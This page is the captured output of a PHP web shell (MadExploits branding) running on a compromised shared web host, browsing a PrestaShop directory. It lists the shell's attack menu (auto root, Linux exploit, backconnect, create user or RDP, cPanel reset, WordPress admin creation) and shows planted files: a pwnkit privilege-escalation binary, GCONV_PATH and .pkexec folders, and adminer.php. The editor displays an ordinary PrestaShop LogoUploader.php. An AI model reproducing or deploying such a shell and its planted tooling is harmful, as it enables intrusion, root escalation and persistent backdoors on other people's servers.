Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
src /
Core /
Shop /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Url
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
LogoUploader.php
7.39
KB
-rw----r--
ShopContextInterface.php
1.28
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LogoUploader.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ namespace PrestaShop\PrestaShop\Core\Shop; use Configuration; use Context; use ImageManager; use PrestaShopException; use Shop; use Tools; /** * Class LogoUploader used to manage upload of Shop logos and favicon. */ class LogoUploader { /** @var the shop */ private $shop; /** * @var array */ private $errors = []; public function __construct(Shop $shop) { $this->shop = $shop; } public function updateHeader() { if ($this->update('PS_LOGO', 'logo')) { list($width, $height) = getimagesize(_PS_IMG_DIR_ . Configuration::get('PS_LOGO')); Configuration::updateValue('SHOP_LOGO_HEIGHT', (int) round($height)); Configuration::updateValue('SHOP_LOGO_WIDTH', (int) round($width)); } } public function updateMail() { $this->update('PS_LOGO_MAIL', 'logo_mail'); } public function updateInvoice() { $this->update('PS_LOGO_INVOICE', 'logo_invoice'); } public function updateFavicon() { $shopId = (int) $this->shop->id; if ($shopId == Configuration::get('PS_SHOP_DEFAULT')) { $this->uploadIco('PS_FAVICON', _PS_IMG_DIR_ . 'favicon.ico'); } if ($this->uploadIco('PS_FAVICON', _PS_IMG_DIR_ . 'favicon-' . $shopId . '.ico')) { Configuration::updateValue('PS_FAVICON', 'favicon-' . $shopId . '.ico'); } Configuration::updateGlobalValue('PS_FAVICON', 'favicon.ico'); } /** * Generic function which allows logo upload. * * @param $fieldName * @param $logoPrefix * @param $files[] the array of files to avoid use $_POST * * @return bool * * @throws PrestaShopException in case of upload failure */ public function update($fieldName, $logoPrefix, array $files = []) { $files = empty($files) ? $_FILES : $files; if (isset($files[$fieldName]['tmp_name'], $files[$fieldName]['tmp_name'], $files[$fieldName]['size'])) { if ($error = ImageManager::validateUpload($files[$fieldName], Tools::getMaxUploadSize())) { throw new PrestaShopException($error); } $tmpName = tempnam(_PS_TMP_IMG_DIR_, 'PS'); if (!$tmpName || !move_uploaded_file($files[$fieldName]['tmp_name'], $tmpName)) { throw new PrestaShopException(sprintf('%Upload of temporary file to %s has failed.', $tmpName)); } $fileExtension = ($fieldName == 'PS_STORES_ICON') ? '.gif' : '.jpg'; $logoName = $this->getLogoName($logoPrefix, $fileExtension); if ($fieldName == 'PS_STORES_ICON') { if (!@ImageManager::resize($tmpName, _PS_IMG_DIR_ . $logoName, null, null, 'gif', true)) { throw new PrestaShopException(sprintf('An error occurred while attempting to copy shop icon %s.', $logoName)); } } else { if (!@ImageManager::resize($tmpName, _PS_IMG_DIR_ . $logoName)) { throw new PrestaShopException(sprintf('An error occurred while attempting to copy shop logo %s.', $logoName)); } } $idShop = $this->shop->id; $idShopGroup = null; if (!count($this->errors) && @filemtime(_PS_IMG_DIR_ . Configuration::get($fieldName))) { if (Shop::isFeatureActive()) { $this->updateInMultiShopContext($idShop, $idShopGroup, $fieldName); } else { @unlink(_PS_IMG_DIR_ . Configuration::get($fieldName)); } } Configuration::updateValue($fieldName, $logoName, false, $idShopGroup, $idShop); unlink($tmpName); return true; } return false; } private function updateInMultiShopContext(&$idShop, &$idShopGroup, $fieldName) { if (Shop::getContext() == Shop::CONTEXT_SHOP) { $idShop = Shop::getContextShopID(); $idShopGroup = Shop::getContextShopGroupID(); Shop::setContext(Shop::CONTEXT_ALL); $logoAll = Configuration::get($fieldName); Shop::setContext(Shop::CONTEXT_GROUP); $logoGroup = Configuration::get($fieldName); Shop::setContext(Shop::CONTEXT_SHOP); $logoShop = Configuration::get($fieldName); if ($logoAll != $logoShop && $logoGroup != $logoShop && $logoShop != false) { @unlink(_PS_IMG_DIR_ . Configuration::get($fieldName)); } } elseif (Shop::getContext() == Shop::CONTEXT_GROUP) { $idShopGroup = Shop::getContextShopGroupID(); Shop::setContext(Shop::CONTEXT_ALL); $logoAll = Configuration::get($fieldName); Shop::setContext(Shop::CONTEXT_GROUP); if ($logoAll != Configuration::get($fieldName)) { @unlink(_PS_IMG_DIR_ . Configuration::get($fieldName)); } } } public function uploadIco($name, $destination, $files = []) { $files = empty($files) ? $_FILES : $files; if (isset($files[$name]['tmp_name']) && !empty($files[$name]['tmp_name'])) { if ($error = ImageManager::validateIconUpload($files[$name])) { throw new PrestaShopException($error); } elseif (!copy($_FILES[$name]['tmp_name'], $destination)) { throw new PrestaShopException(Context::getContext()->getTranslator()->trans('An error occurred while uploading the favicon: cannot copy file "%s" to folder "%s".', [$files[$name]['tmp_name'], $destination], 'Admin.Design.Notification')); } } return !count($this->errors); } private function getLogoName($logoPrefix, $fileExtension) { $shopId = $this->shop->id; $shopName = $this->shop->name; $logoName = Tools::link_rewrite($shopName) . '-' . $logoPrefix . '-' . (int) Configuration::get('PS_IMG_UPDATE_TIME') . (int) $shopId . $fileExtension; if ($this->shop->getContext() == Shop::CONTEXT_ALL || $shopId == 0 || Shop::isFeatureActive() == false ) { $logoName = Tools::link_rewrite($shopName) . '-' . $logoPrefix . '-' . (int) Configuration::get('PS_IMG_UPDATE_TIME') . $fileExtension; } return $logoName; } }
Close